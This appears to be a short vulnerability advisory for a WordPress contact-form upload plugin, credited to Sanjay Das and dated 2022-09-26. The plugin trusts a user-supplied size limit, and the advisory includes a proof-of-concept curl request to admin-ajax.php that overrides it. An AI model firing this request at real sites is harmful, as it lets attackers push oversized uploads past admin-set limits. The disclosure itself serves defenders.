The plugin does not properly check for the upload size limit set in forms, taking the value from user input sent when submitting the form. As a result, attackers could control the file length limit and bypass the limit set by admins in the contact form.
curl -X POST -F "size_limit=10485760" -F "action=dnd_codedropz_upload" -F "type=click" -F "form_id=156" -F "upload_name=upload-file-235" -F "[email protected]" https://example.com/wordpress/wp-admin/admin-ajax.php
BYPASS
Sanjay Das
Sanjay Das
Yes
2022-09-26 (about 8 months ago)
2022-09-26 (about 8 months ago)
2022-09-26 (about 8 months ago)